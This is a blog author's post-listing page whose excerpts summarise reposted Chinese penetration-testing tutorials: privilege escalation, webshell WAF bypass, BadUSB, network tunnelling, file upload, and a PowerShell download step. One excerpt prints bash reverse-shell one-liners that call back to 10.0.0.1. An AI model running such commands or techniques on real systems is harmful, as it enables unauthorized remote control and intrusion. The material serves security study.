自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(192)
  • 资源 (4)
  • 收藏
  • 关注

转载 Window 提权基础

本篇教程是笔者翻译国外大牛 fuzzysecurity 的文章http://www.fuzzysecurity.com/tutorials/16.html再加上个人的理解写出的关于 Windows 提权基础的文章,其中有些地方因为不太实用所以做了适当修改,感谢@hl0rey的帮助和建议。Indispensable Resources:Encyclopaedia Of Windows Privilege Escalation (Brett Moore)https://www.yo..

2022-05-31 06:57:19 461

转载 初窥火狐浏览器插件后门

插件的基本机构及其作用1、manifest.json这个文件是每个插件都必须有的一个文件(其他的文件是可选的),它定义了插件的所有的信息,如权限,要引入哪些脚本,包含哪些资源等等。2、Background pages 后台执行的脚本,如果你的插件需要有一个脚本文件一直在后台执行的话,这个脚本不在任何用户的可见的页签里运行,而是在浏览器为它创建的一个空白页里运行,所以它不能访问别的网页的DOM,所以用它没法做js注入。3、Content scripts 直译是内容脚本,我理解为对应某内容而运.

2022-05-31 06:55:16 592

转载 RPO 相对路径覆盖攻击

RPO (Relative Path Overwrite) 相对路径覆盖,最早由 Gareth Heyes 在其发表的文章中提出。主要是利用浏览器的一些特性和部分服务端的配置差异导致的漏洞,通过一些技巧,我们可以通过引入相对路径来引入其他资源文件,以达到我们的目的。漏洞成因:RPO 依赖于浏览器和网络服务器的反应,基于服务器的 Web 缓存技术和配置差异,以及服务器和客户端游览器的解析差异,利用前端代码中加载的 css/js 的相对路径来加载其他文件,最终浏览器将服务器返回的不是 css/js 文件

2022-05-31 06:53:43 1946

转载 webshell 常见 Bypass waf 技巧总结

对于很多,和我一样刚刚入门,或者还在门边徘徊的小伙伴们,在渗透学习的过程中,总会遇到各种情况,例如 php 大马被 waf 拦截的时候,那么如何制作免杀 php webshell 呢,接下来就由我带各位小伙伴们一起踏上大马免杀之路,不喜勿喷。一篇好的文章,内容可以差,目录一定要 ~~ 吹牛 ~~ 真实。一. webshell 免杀0x0 php 内置函数加密小例子: 在制作免杀大马之前,我们先来看看,一个带后门的免杀 php 大马是如何制作的。在后门网站webshell8下载..

2022-05-31 06:52:06 735

转载 分析绕过一款适合练手的云 WAF

X-WAF 是一款适用中、小企业的云 WAF 系统,让中、小企业也可以非常方便地拥有自己的免费云 WAF。本文从代码出发,一步步理解 WAF 的工作原理,多姿势进行 WAF Bypass。0x01 环境搭建官网:https://waf.xsec.io>github 源码:https://github.com/xsec-lab/x-wafX-WAF 下载安装后,设置反向代理访问构造的 SQL 注入点0x02 代码分析首先看一下整体的目录结构,nginx_con

2022-05-31 06:50:29 262

转载 打造一款自动扫描全网漏洞的扫描器

在渗透测试中,扫描器必不可少,毕竟目标很多,需要检测点也很多,不可能全部手工搞定的,所以很多渗透者都有自己的自动化工具或者脚本,这里就为大家分享一款由我自己开发的一个自动化全网漏洞扫描工具。扫描原理由 Python+Mysql 打造的扫描器,主要目的是实现自动化采集网站,扫描网站的常规性漏洞。希望做到挂机就能实现自动化发掘敏感情报,亦或是发现网站的漏洞或者隐藏可利用的漏洞软件工程的核心功能就必须满足以下的需求。1、能无限爬行采集互联网上存活的网址链接2、能对采集到的链接进行是否存活扫描

2022-05-31 06:49:05 854 1

转载 简单粗暴的文件上传漏洞

文件上传漏洞可以说是日常渗透测试用得最多的一个漏洞,因为用它获得服务器权限最快最直接。但是想真正把这个漏洞利用好却不那么容易,其中有很多技巧,也有很多需要掌握的知识。俗话说,知己知彼方能百战不殆,因此想要研究怎么防护漏洞,就要了解怎么去利用。特点1、利用简单2、危害大产生原因缺少必要的校验代码审计基础关于 PHP 中 $_FILES 数组的使用方法$_FILES[‘file’][‘name’] 客户端文件名称$_FILES[‘file’][‘type’] 文件的

2022-05-30 07:21:55 1430

转载 PE 病毒与 msf 奇遇记

0x01 PE 病毒简介通俗的讲,PE 病毒就是感染 PE 文件的病毒,通过修改可执行文件的代码中程序入口地址,变为恶意代码的的入口,导致程序运行时执行恶意代码。我们学习 PE 病毒的目的是为了深入了解 32 位的 PE 结构。git 链接(上一期的也上传了):https://github.com/x-encounter/C-code网盘链接(附带两张图,一个描述各字段偏移的 word 文档):https://pan.baidu.com/s/1BCDpctJ_EDBdZC7rL

2022-05-30 07:19:46 222

转载 分析、还原一次typecho入侵事件

基友szrzvdny的朋友博客被入侵了,由于是虚拟空间,所以只有 apache 访问日志以供分析这里的日志已经做去敏操作了,以供学习:https://pan.baidu.com/s/1JUII7_ZOK1SIxnWxlzu0Hw密码: bykr整个事情发生的挺突然的,我也是第一次搞这种溯源、应急响应的东西~一想到说不定就拿到了typecho的 0day,其实还是很激动的。首先分析日志,Linux 可以用 grep我:Windows、Notepad++首先直接查找木马文件...

2022-05-30 07:18:16 195

转载 路由器漏洞 EXP 开发实践

测试环境Debian 9Qemu本文主要以 CVE-2013-0230 漏洞为例,讲解路由器上缓冲区漏洞的 exp 编写。0x01 环境搭建使用 firmware-analysis-toolkitfirmware-analysis-toolkithttps://github.com/attify/firmware-analysis-toolkit是模拟固件和分析安全漏洞的工具。该工具可以自动的解压固件和创建 image 使用 qemu 来模拟路由器。在本文

2022-05-30 07:17:07 1578

转载 审计 tinyshop 中风险

审计该 CMS 中的内容只涉及到前台,后台中有存安全问题但对我来说没什么意义,所以没有过多的关注,感兴趣的朋友可以自己动动手。因为本身已经做了一定的安全加固,本次审计并没挖掘出高危漏洞。但存在几个可以对网站造成危害的安全风险,在此仅做为思路分享给大家参考学习。框架是这个 CMS 自写的,里面处理接收参数均在./framework/lib/util/request_class.php文件中,比如://同时处理$_GET $_POSTpublic static function ..

2022-05-30 07:14:38 145

转载 脚本木马黑吃黑现象

水文一篇,大佬请一笑而过。接记一次有趣的渗透测试Damian表哥的文章我看了表哥的文章觉得很赞耶,看文章的也能得免杀大马,真是太赞了。看到表哥有大佬带就是好,文章最后Damian表哥也分享了文章的免杀大马和1.php赶紧下载下来怕百度云分享失效。长夜漫漫,好鸡儿无聊啊,打开表哥的免杀大马分析一波。分析大马细致假装分析首先看这段。我们去掉'.很明显浮现在我们面前的是 php 代码,是的没错同学们。大概就是首先大马作者,将大马源码先使用g...

2022-05-30 07:14:11 124

转载 ring3层恶意代码实例汇总

之前一期我们学习了 IAT 的基本结构,相信大家对 C++ 有了一个基本的认识,这一期放点干货,我把 ring3 层恶意代码常用的编程技术给大家整理了一下,所有代码都经过我亲手调试并打上了非常详细的注释供大家学习,如下图:我会在其中挑出几个,采用反汇编的方式,给大家展示恶意代码的执行流程以及原理,由于 ring3 层的技术过于古老,希望大家秉着学习和巩固的心态来看待该文章。一共九种技术,十套源代码,分两期向大家介绍编程相关思路,希望大家与我一起学习,共同进步。源码下载地址(稍后会把源码上传到

2022-05-16 08:58:08 182

转载 Java代码审计-铁人下载系统

初学 java 代码审计,跟着表哥们脚步,走一遍审计流程,就选了个没有使用 Java 框架的 java 系统,作为入门。目的是为了熟悉代码审计流程,寻找漏洞的思路,入门记录。准备工作为了验证审计出的漏洞效果,还是要搭建起来系统,不然空说无凭。为了方便,使用JspStudy 2016一体化环境,选择tomcat 8.0,jdk 1.8搭建。查看代码使用IDEA,当然,也可以用jd-gui,反编译class,不过IDEA自动就反编译了,比较方便。值得注意的是,使用系统自带的安...

2022-05-16 08:56:28 322

转载 打造属于自己的渗透神器 第二篇

上次打造的渗透神器大家喜不喜欢呀,地址:打造属于自己的渗透神器。今天我又给大家带来了新的一篇打造一个属于自己的渗透神器,之前在浏览视频的时候看到一部视频就是讲这个的今天我们就一起试一下。badusb 是什么?(以下教程据有攻击性,请妥当使用)通过硬件直接插入对方电脑,让对方电脑执行代码,达到干扰、控制主机或者窃取信息等目的。他的是干什么的?他可以进行 HID 攻击。HID 是 Human Interface Device 的缩写,由其名称可以了解 HID 设备是直接与人交互的

2022-05-16 08:55:10 227

转载 记一次有趣的渗透测试

最近在做渗透测试的练习中遇到一个比较有意思的站点,在此记录下来,希望能给向我一样刚入安全圈不久的萌新提供一些基本思路吧。在拿到目标站点的域名时,首要的工作肯定是进行一系列的信息搜集工作,具体搜集哪些信息以及怎么有效搜集,可以参考 Google 或者百度。下面为了文章的简洁性,我只提及我会利用到的一些站点信息。首先网站的真实 IP 并没有隐藏在 CDN 后面,直接在 ThreadBook 上查看同 IP 的旁站,显示足足 189 个!看到这个数的时候,说实话内心是沉重的,虽然可以从众多的旁

2022-05-16 08:54:10 257

转载 python 2.7正则上篇

re模块详解re模块所包含的所有函数如下图:compile功能介绍根据一个模式字符串和可选的标志参数生成一个正则表达式对象。该对象拥有一系列方法用于正则表达式匹配和替换。可以提高正则的匹配速度,重复利用正则表达式对象。用法介绍函数原型:re.compile(pattern[, flag])参数解释:pattern为要编译的正则表达式,flag为前文图中的标志位。flag不同值对应的解释如下图:例子匹配字符串Myh0St所有字符,不忽略大小写与忽略大小写的区别

2022-04-13 09:32:48 305

转载 Python 2.7 正则中篇

前言本篇文章的主要内容是使用Python匹配ASCII字符串的各种姿势。基本知识ASCII码对照表.元字符对照表什么是元字符如上面元字符对照表里的所有字符在正则中表现是一个范围而不能作为字符匹配,例如[0-9]之中的-用来表示0到9的一个范围,而不能匹配横线字符。什么是转义像$、^ 这类元字符,在正则中有特殊的含义,有的时候并不需要表示其特殊含义只想表示普通字符的含义,此时就必须对元字符做转义,可以使用反斜杠转义元字符,如^经过转义后变为 \ ^。详细解读正则

2022-04-13 09:32:04 194

转载 python 2.7正则下篇

上篇的补充关于命名分组下面看一个例子:看的出来(?P<year>\d{4})中,可以用尖括号中的名字去获取后面正则匹配出来的数值,这样方便调用,便于记忆。关于非捕获性括号这些内容就是我上篇不太懂的地方,下面看个例子来理解一下,如图:对比两个例子发现,在使用(?:\d+)的时候,只是做了匹配的动作,但是并没有打印出来结果,这就是非捕获型括号的作用,我们在匹配域名的时候就可以使用到,如下:怎么样?看出区别了吧。关于捕获型括号这个东西也不太好懂,我们

2022-04-13 09:30:52 109

转载 穿越边界的姿势

在企业安全对抗中,红方攻击团队经常会遇到这种情况,在企业的网络边界上获取到部分权限,比如一个web服务器的webshell,然而如何更方便的进行下一步的渗透呢?如何对内网进行渗透测试,这时就需要隧道转发技术,穿透边界防火墙、安全代理等安全设备,进行深层次的安全测试。本文的主要内容是穿透内网的各种姿势。典型的边界网络架构图利用ssh建立隧道动态端口转发原理:建立一个动态的SOCKS4/5的代理通道,紧接着的是本地监听的端口号;动态端口转发是建立一个ssh加密的SOCKS4/5代理通道,任何

2022-04-13 09:30:11 355

转载 论二级域名收集的各种姿势

测试dns域传送测试方式如图:当然,这种方式不一定都能成功,但也不失为一种获取二级域名的方式。反查whois工具:站长工具1 查询whoishttp://whois.chinaz.com/baidu.com2 反查whoishttp://whois.chinaz.com/[email protected]&ddlSearchMode=1获得关联域名信息通过搜索引擎搜索推荐工具:https://github.com/lar..

2022-04-13 09:29:24 512

转载 为Nmap添砖加瓦

Nmap介绍Nmap作为一款优秀的端口扫描器,被所有渗透测试人员当作工作中必不可少的辅助工具,它不仅支持多种扫描方式,还支持添加漏洞测试脚本,在强大的lua脚本支持下,使得nmap更加如虎添翼,官方的nmap自带有非常多的脚本,这些不是今天的主角,今天的主角是如何编写属于自己的脚本,为namp的强大添砖加瓦。理解nse脚本的结构任何脚本插件都有自己的编写规则,都有一定的模板,所以nmap的脚本也不例外,想要编写脚本,必须去了解其编写规则,以及执行流程,下面我们就一起学习学习。大家可以先去看一下f

2022-04-13 09:28:56 160

转载 内网中间人的玩法

在内网渗透测试中,我们可以欺骗攻击网络配置和服务。这种攻击方式主要针对ARP(地址解析协议)、DHCP(动态主机配置协议)和DNS服务器配置不当造成的安全隐患。还有一种比较常见的攻击方式就是中间人攻击,他能够使我们通过监控网络流量获取敏感信息。我们可以对网络设备采取安全措施来预防攻击。但是,由于一些协议固有的弱点来进行攻击,本文就是利用LLMNR NetBIOS和WPAD机制来进行中间人攻击。下面我们先了解一下DNS的查询过程,如图所示:下面是在内网中dns查询的几个关键步骤:1 文件系统中

2022-04-13 09:27:08 238

转载 浅谈ddos的测试方式

DOS(denial of service--拒绝服务)攻击的目的是使服务正常功能不可用。不像其他类型的攻击的目的是获取敏感信息,Dos攻击是不会威胁到敏感信息而是使合法用户不能使用服务。有时候Dos在其他攻击中也会存在一定的作用,比如使web应用防火墙拒绝服务,从而绕过防火墙。DOS与DDOS的区别Dos是拒绝服务攻击,而DDOS是分布式拒绝服务攻击;Dos与DDOS都是攻击目标服务器、网络服务的一种方式。Dos是利用自己的计算机攻击目标,也是一对一的关系,而DDOS是DoS攻击基础之上产生的一种

2022-04-12 15:44:22 1712

转载 DNS隧道技术解析

在之前穿越边界的姿势文章中介绍了几种穿透内网的方式,今天的这种方式再之前的文章里没有提及,所以今天来重点介绍使用dns协议穿透内网。DNS基础大家可以自行搜索关于dns的几种查询方式以及查询流程,因为比较基础,我这里就不贴了。下面贴一个关于dns查询的图,大家自行理解:DNS隧道技术是如何实现的一个查询的流程我们通过下图来理解一下第一步: 黑客向内部dns服务器发送一个查询hacker.com的请求(这个域名的控制权限是在黑客手里的)第二步:内部dns服务器通过防火墙向根

2022-04-12 15:43:41 723

转载 SCADA渗透测试

SCADA简介SCADA(Supervisory Control And Data Acquisition)即数据采集与监视控制系统。SCADA系统是以计算机为基础的DCS与电力自动化监控系统;它应用领域很广,可以应用于电力、冶金、石油、化工、燃气、铁路等领域的数据采集与监视控制以及过程控制等诸多领域。近年来,SCADA系统已经从专有,封闭的网络和系统转移到开放系统和TCP / IP网络。 这暴露了这些网络与传统计算机网络面临的相同风险。 然而,这并不一定意味着SCADA评估的安全评估方法仍然是一样

2022-04-12 15:42:49 618

转载 数据库查询基础

关于注入字符的解释这些字符可以用不同方式表示,比如unicode、在字符被过滤的时候可以利用其他方式绕过。常见的绕过认证的方式关于sql server的注入关于Subase关于Mysql关于Oracle关于PostgreSQL关于DB2关于Ingres总结这里包含了各种常见数据库的查询语句以及功能函数的简单介绍,如果大家看到有什么的不对的地方,请大家在后面留言,供大家参考。...

2022-04-12 15:42:21 4740

转载 信息安全基础

安全基本原则安全的核心目标就是为关键资产提供可用性、完整性和机密性(AIC三元组)的保护可用性(availability)确保授权的用户对数据和资源进行及时和可靠的访问。 网络由众多长时间不间断运行的硬件设备和软件组成,硬件设备像路由器、交换机、DNS服务器、DHCP服务器、代理和防火墙等,而软件则包含操作系统、应用程序和反病毒软件等。我们要在保证这些硬件及软件正常运行的同时还有很多物理因素可能影响资源 的可用性如环境因素(大火、洪水、通风、电力等问题)、潜在的自然灾害和物理偷窃或攻击等,由此可

2022-04-12 15:41:05 222

转载 Linux&bash闯关CTF

关卡说明每一关的目标是获取下一关的入口密码,有了这个密码才能进行下一关。第一关描述下一关的密码保存在当前目录下的readme中。命令第二关描述下一关密码保存在系统中文件名中包含'-'的文件。命令第三关描述下一关密码保存在当前目录下的隐藏文件中命令第四关描述下一关密码保存在当前目录的一个text文件中命令第五关描述下一关的密码保存在符合几个条件的文件中,条件包含:文件大小为1033字节、不可执行、可读文件。命令

2022-04-12 15:40:38 424

转载 Oauth协议介绍与安全隐患

Oauth2.0 简介OAuth 是一个开放标准,允许用户让第三方应用访问该用户在某一网站上存储的私密的资源(如照片,视频,联系人列表),而无需将用户名和密码提供给第三方应用。目前,OAuth 的最新版本为 2.0OAuth 2.0 的规范可以参考 : RFC 6749(https://tools.ietf.org/html/rfc6749)涉及的关键词解释(1)Third-party application:第三方应用程序,本文中又称"客户端"(client)。(2)HTTP serv

2022-04-12 15:39:36 407

转载 windows命令执行上传文件的姿势

我们在做渗透测试的时候会经常遇到存在命令执行的Windows服务器,而且不能上传shell,唯一的入口就是命令执行,这种情况下,我们需要向服务器上传一个大一点的工具,如何实现,这就是本文章主要的内容。利用http协议下载文件利用vbs下载将下面的代码保存为test.vbs执行如下语句:cscript test.vbs利用powershell下载将如下代码保存为test.ps1$p = New-Object System.Net.WebClient$p.Download

2022-04-12 15:38:52 1337

转载 Linux本地信息收集

我们在获取到webshell之后,经常会遇到Linux的操作系统,这是我们需要对Linux系统本地的敏感资源进行信息收集,下面就是一些有用的信息获取方式。获取内核,操作系统和设备信息命令 作用 uname -a 打印所有可用的系统信息 uname -r 内核版本信息 uname -n 系统主机名字 hostname 主机名 uname -m Linux内核架构(x86/x64) cat /proc/version 内核信息 cat

2022-04-12 15:38:19 278

转载 web应用渗透测试流程

对于web应用的渗透测试,一般分为三个阶段:信息收集、漏洞发现以及漏洞利用。下面我们就分别谈谈每个阶段需要做的事情。信息收集在信息收集阶段,我们需要尽量多的收集关于目标web应用的各种信息,比如:脚本语言的类型、服务器的类型、目录的结构、使用的开源软件、数据库类型、所有链接页面,用到的框架等脚本语言的类型常见的脚本语言的类型包括:php、asp、aspx、jsp等测试方法1 爬取网站所有链接,查看后缀2 直接访问一个不存在页面后面加不同的后缀测试3 查看robots.txt,

2022-04-12 15:37:51 1125

转载 linux常用下载工具

重点介绍一下wget这个工具是在linux下最常用的下载的工具,支持多种条件的下载。普通下载wgethttp://example.com/file.iso指定保存文件名wget ‐‐output-document=myname.isohttp://example.com/file.iso保存到指定目录wget ‐‐directory-prefix=folder/subfolderhttp://example.com/file.iso大文件断点续传wget ‐‐con...

2022-04-11 10:42:49 3659

转载 linux下反弹shell的姿势

通常在获得webshell之后,如果是linux的服务器,一般会返回一个shell来对linux服务器做进一步的渗透,如:溢出提权、信息收集等。下面就说说linux自带的程序来反弹shell的姿势。自带工具Bash针对不同的linux版本,可能有不同的利用方式,这里简单列一下,在使用的时候大家自行测试。0x01bash -i >& /dev/tcp/10.0.0.1/8080 0>&10x02exec /bin/bash 0&0 2>

2022-04-11 10:42:20 215

转载 如何成为一个安全架构师

如何成为一个安全架构师,安全架构师需要什么样的能力?首先要理解什么是安全架构,安全架构包含哪些组件,如何将这些安全组件合理的组织在一起形成一定的战斗力,这是非常关键的。安全架构架构是组件与组件之间的关系,而安全架构是指安全组件与安全组件之间的关系。作为安全架构师需要做的就是要将跟安全相关的所有组件如何合理的组织到一起,使得每一个组件都能充分的发挥其作用,营造一个更加安全的环境。安全组件常用的安全技术基础或常识、安全机制、算法、工具组件、安全要素、独立实现某种安全功能的安全产品组织、人员、

2022-04-11 10:41:40 310

转载 Linux需要谨慎使用的几个命令

运维人员经常接触的Linux系统比较多,在Linux下的管理与操作通常都是通过命令行的方式对服务器进行操作,为了操作安全,有些命令的危害是特别大的,需要谨慎使用,下面就简单列了几个比较常见的命令。rm -rfrm命令大家都不陌生,rf参数也都知道是什么意思,意思是强制删除指定目录下的所有文件和文件夹,经常有同学在使用这个命令的时候出现误操作,指定的目录写成根目录导致悲剧的发生,我有一次在使用这个命令的时候,本来以为自己已经切换到我要删除的目录,然后使用了【rm -rf .】,然而并没有切换,直接将网

2022-04-11 10:41:09 432

转载 常见端口及安全测试

如今,随着移动互联网的发展,移动APP的安全问题已被各大公司所重视,然而,内部APP不像对外业务APP那样,做过严格的安全测试,自然安全性也不会那么高,所以内部APP可以成为突破企业安全边界的新的威胁,下面我们就大概介绍一下,内部APP的一些安全弱点以及威胁。内部APP获取方式在渗透测试中,想要利用内部APP的弱点突破内网,那么我们首先需要的是利用什么样的方式获取到内部APP,然后对其进行检测,利用其弱点突破内网。社工钓鱼这个方式不只是可以在这里使用,他的作用在不同的人手里可以发挥不同的作用

2022-04-11 10:40:37 867

转载 二进制漏洞学习笔记

二进制漏洞学习笔记_栈溢出在阅读本文之前需要了解的一些东西如下C语言linux逆向工程刚开始所演示的漏洞会没有任何保护机制,到后来会逐步加上一些保护措施。环境Linux ubuntu 16.04.1 x86_64ldd (Ubuntu GLIBC 2.23-0ubuntu9) 2.23在正式开始讲解漏洞之前,引用一段维基百科关于漏洞利用的介绍漏洞利用(英语:Exploit,本意为“利用”)是计算机安全术语,指的是利用程序中的某些漏洞,来得到计算机的控制权(使自..

2022-04-11 10:39:00 429

转载 Pentester Lab SQL to shell

PentesterLab提供了可用于测试和了解漏洞的易受攻击的系统。官方地址:https://pentesterlab.com/渗透环境Kali 192.168.22.128靶机 我们去发现。(在同一内网)正文开始首先先介绍一款工具,个人觉得老牛逼——Netdiscover,之前我询问一哥们arp扫描工具时他推荐的。工具可以在网络上扫描IP地址,检查在线主机或搜索为它们发送的ARP请求,root@kali:~# netdiscover //直接回车不带任何自动快速发现

2022-04-11 10:38:08 292

burp使用说明

这个是一款很强大的黑客软件burp的使用说明详解!

2012-11-02

nc反弹cmd.zip

nc反弹cmd.zip

2012-08-04

网站发布网站具体步骤

网站发布网站具体步骤,申请域名,作用不小哦

2012-05-18

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除